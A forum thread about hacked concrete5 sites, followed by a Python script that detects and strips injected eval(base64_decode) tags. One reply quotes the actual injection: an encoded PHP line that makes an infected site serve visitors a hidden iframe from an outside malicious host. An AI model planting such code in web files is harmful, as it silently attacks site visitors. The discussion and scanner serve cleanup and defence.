Someone hacking into index.php

I have a site that keeps getting corrupted with a javascript that is obviously getting placed by a hacker.

The database password has been changed and the password to the server has been changed. I am contacting the web host to help resolve the issue as well.

I am wondering if anyone else has run across this issue and how you resolved it.

FatTony1952
 
nteaviation replied:
We had someone hack our index.php and insert some php code. It appears it is a javascript redirect ploy. It did not work (HaHa) and was easy enough to fix.
<?php 
require('concrete/dispatcher.php');<?php eval(base64_decode("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")); ?>
<?php eval(base64_decode("aWYocHJlZ19tYXRjaCgiL3J1L2kiLCRfU0VSVkVSWydIVFRQX0FDQ0VQVF9MQU5HVUFHRSddKSkNCgkJZWNobyAnPGlmcmFtZSBzcmM9Imh0dHA6Ly9hZGhlc2l2ZXN0cmVuZ3RoLmluL2luLmNnaT8xODQiIGZyYW1lYm9yZGVyPSIwIiB3aWR0aD0iMyIgaGVpZ2h0PSIzIiBzdHlsZT0idmlzaWJpbGl0eTogaGlkZGVuOyI+PC9pZnJhbWU+Jzs=")); ?>
FatTony1952 replied:
Yeah, it was an easy fix, just frustrating though. I found the script in the index.php, dispatcher.php and both files in the config folder.
nteaviation replied:
Changing the account password took care of it. Not sure how they got in, our password was fairly secure. Now it's REAL secure :)
albinbuilt replied:
I just discovered that my index.php file was hacked (I have not checked the other files mentioned). I see that you mentioned the fix was easy. What was the fix for the file? Is there a repair option within C5 or did you manually repair the file/s? I am looking for a backup of the file, but I am not sure if I backed it up. Fixing the file is only a patch, seeing as the hacker could do it again. When this type of hack happens, is the hacker typically getting in through the database, the Concrete5 login, an FTP account login, or the cPanel login?
I could change all my passwords, but I feel there were several that were already close to bullet proof passwords (I say close to bullet proof, because I am guessing that all passwords can be hacked.... if the hacker has the time to keep trying.)

Thanks for any help you can give.

Albin
Mnkras replied:
In the index.php you just need

<?php 
require('concrete/dispatcher.php');
albinbuilt replied:
Mnkras, Thanks for the info. I renamed the bad index.php file to indextrashed.php and then replaced it with an index.php file with just the code you mentioned, and it worked like a charm.

Now I need to plug up the holes in the site access.

Thanks again

Albin
spw2000 replied:
Had a similar problem with osCommerce (same hack method). Found a (community) developer who is GREAT and very generous with his time. He created osc_sec.php, which is included in the osCommerce equivalent of dispatcher.php and detects, alerts and foils attacks. Very impressive. I am sure he can come up with something for C5 too: try Rangi (rohepotae@gmail.com) and tell him the reference was from the osCommerce guy from Fansonline :)
nteaviation replied:
In our case they located every index file (index.php/index.html... etc) and inserted the base64 javascript code on the end of the file. If you see any php like "eval(base64_decode" nuke it. I suspect it was done via ftp so none of the Concrete5 Passwords were compromised, only our web host's account password. Hope it helps :)
albinbuilt replied:
I will look around for any php files that have the content you mentioned, and I am going to clean up all my unneeded ftp accounts and strengthen all the other passwords.

Thanks for your help.

Albin
Justifi replied:
Hey guys,

I know this is an old thread, but I'm experiencing this problem for the first time and pretty new (completely new) to programming, web management, so thanks for the help!

I've been able to go in and find the index.php and the dispatcher.php file and remove the code manually, but it looks like the [eval(debug] code is in EVERY ONE of the php files on my site.

How do I mass-remove this code? Is there a quick fix that I won't mess up or are we best off trying to hire someone to fix this? What's our best option?

Thanks a bunch,

Steve
albinbuilt replied:
Sorry to hear about your site.

If you have that many files that are corrupt I would think it would be best to restore from a recent backup. Does your host do automatic backups?

The next is just a brainstorm idea and someone might come in and tell you this is a bad idea because certain files contain site-specific settings (MySQL settings, passwords, concrete5 community connections, info about the add-ons you have installed...). Another option is to install a second copy, but the same version, of concrete5 in a sub-domain (sub-folder), then copy over the php files. Maybe someone can tell you what php files you should not copy over and need special attention.

Albin
albinbuilt replied:
I did a search for "eval(base64_decode" in all php files, and came up empty. So currently it looks like the index.php file is the only file that was changed.
nteaviation replied:
I am sure there are many variants of this hack. Here is some info:
http://hubpages.com/hub/How-To-Remove-The-evalbase64_decode-Virus...

There is also a way to decode the encoded data to see what it was trying to do. Google around for that :) As I mentioned above, ours decoded into a javascript redirection ploy to a malicious site.
HOBOcs replied:
Looks like I have a hacked website as well, with all .PHP files containing an "eval(base64_decode" prefix.

I've done a check of the php files and index.php is infected, and it appears that all the php files contain this "header" insertion.
I'm not sure my hoster has a recent backup, and if not then I suspect I have to do a lot of editing on all the .php files.

Any suggestions on a better solution? (I know, backups, backups)
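The search-and-decode routine described earlier in the thread (grep every .php file for "eval(base64_decode", decode the payload to see what it does, strip the injected tag), written out as an added example. This is not code from the thread or from concrete5; it assumes the injected fragment has the full `<?php eval(base64_decode("...")); ?>` form posted above. Only that exact form is removed (after writing a `.infected.bak` copy); any other `eval(base64_decode(` occurrence is counted as "leftover" and left for manual review, and the decoded payload is only displayed, never executed. The infected sample file and its base64 payload are constructed for the demo.

```python
import base64
import binascii
import os
import re
import shutil
import tempfile
from typing import Dict, List, Tuple

# The injected tag exactly as it appeared in the thread: <?php eval(base64_decode("...")); ?>
INJECTED_TAG = re.compile(
    r'<\?php\s*eval\(\s*base64_decode\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)\s*\)\s*;?\s*\?>'
)
# Any eval(base64_decode( that is NOT in the full-tag form above: report only, never auto-remove.
LOOSE_EVAL = re.compile(r'eval\s*\(\s*base64_decode\s*\(')

# Constructed sample payload and infected index.php (harmless; stands in for the real one).
SAMPLE_B64 = base64.b64encode(b"echo 'constructed sample';").decode()
SAMPLE_INFECTED = (
    "<?php \nrequire('concrete/dispatcher.php');"
    f'<?php eval(base64_decode("{SAMPLE_B64}")); ?>\n'
)


def decode_payload(b64: str) -> str:
    """Decode the base64 argument so a human can read it; nothing is executed."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-8", errors="replace")
    except (binascii.Error, ValueError):
        return "<undecodable base64>"


def find_injections(source: str) -> List[Tuple[str, str]]:
    """Return (encoded, decoded) pairs for every full injected tag in the source text."""
    return [(m.group(1), decode_payload(m.group(1))) for m in INJECTED_TAG.finditer(source)]


def clean_source(source: str) -> Tuple[str, int, int]:
    """Strip full injected tags; return (cleaned_text, removed_count, leftover_suspicious)."""
    cleaned, removed = INJECTED_TAG.subn("", source)
    leftover = len(LOOSE_EVAL.findall(cleaned))
    return cleaned, removed, leftover


def scan_tree(root: str, fix: bool = False) -> Dict[str, dict]:
    """Walk root for *.php files and report injections; with fix=True, back up and rewrite."""
    report: Dict[str, dict] = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="surrogateescape") as fh:
                source = fh.read()
            cleaned, removed, leftover = clean_source(source)
            if removed == 0 and leftover == 0:
                continue  # clean file
            report[path] = {
                "removed": removed,
                "leftover": leftover,  # needs manual review if > 0
                "payloads": [decoded for _, decoded in find_injections(source)],
            }
            if fix and removed:
                shutil.copy2(path, path + ".infected.bak")  # keep evidence before rewriting
                with open(path, "w", encoding="utf-8", errors="surrogateescape") as fh:
                    fh.write(cleaned)
    return report


def demo_scan(fix: bool = True) -> dict:
    """Build a constructed throwaway site tree, scan/clean it, and return the report."""
    root = tempfile.mkdtemp(prefix="php_scan_")
    os.makedirs(os.path.join(root, "config"))
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write(SAMPLE_INFECTED)
    with open(os.path.join(root, "config", "site.php"), "w") as fh:
        fh.write("<?php define('SITE', 'example'); ?>\n")  # clean file, should not be reported
    report = scan_tree(root, fix=fix)
    with open(os.path.join(root, "index.php")) as fh:
        report["_index_after"] = fh.read()
    shutil.rmtree(root)
    return report


if __name__ == "__main__":
    for path, info in demo_scan().items():
        print(path, info)
```

Run it with `fix=False` first (the default for `scan_tree`) to get a report of what would be touched and what each payload decodes to; only then rerun with `fix=True`. Files whose report shows a non-zero "leftover" count contain an eval that does not match the known form and should be opened by hand rather than trusted to the regex.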